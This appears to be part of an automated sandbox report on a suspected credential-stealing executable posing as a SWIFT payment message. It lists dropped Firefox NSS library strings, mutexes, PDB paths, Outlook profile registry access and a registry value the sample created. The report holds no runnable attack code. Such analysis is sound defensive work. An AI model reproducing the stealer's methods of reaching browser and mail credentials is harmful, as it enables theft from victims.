Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL id FROM %s;
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Mutant created: \Sessions\1\BaseNamedObjects\AB1F56922-9414907A-A61E15EF-B8590654-32BFA095
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:120:WilError_03
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fivefoldness\Endosseringerne\Fouragen Jump to behavior
Source: Swift Mesaj#U0131#09971.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7983291992.000000001DD14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019749617.000000001E6E4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7984985942.000000001DD18000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019860859.000000001E6E8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020444307.000000001E700000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988349897.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020557418.000000001E704000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988556068.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020103114.000000001E6F8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7964990945.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015685124.000000001E658000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7966613204.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015801612.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015896144.000000001E660000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015552938.000000001E654000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.4.dr
Source: Binary string: ucrtbase.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011268620.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8008974466.000000001E830000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027706325.0000000000060000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.4.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015552938.000000001E654000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018902003.000000001E6B8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019677898.000000001E6D8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019472505.000000001E6D0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019579766.000000001E6D4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7982644058.000000001DD10000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981695416.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988556068.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7989641253.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018902003.000000001E6B8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019253907.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019101053.000000001E6BC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.4.dr
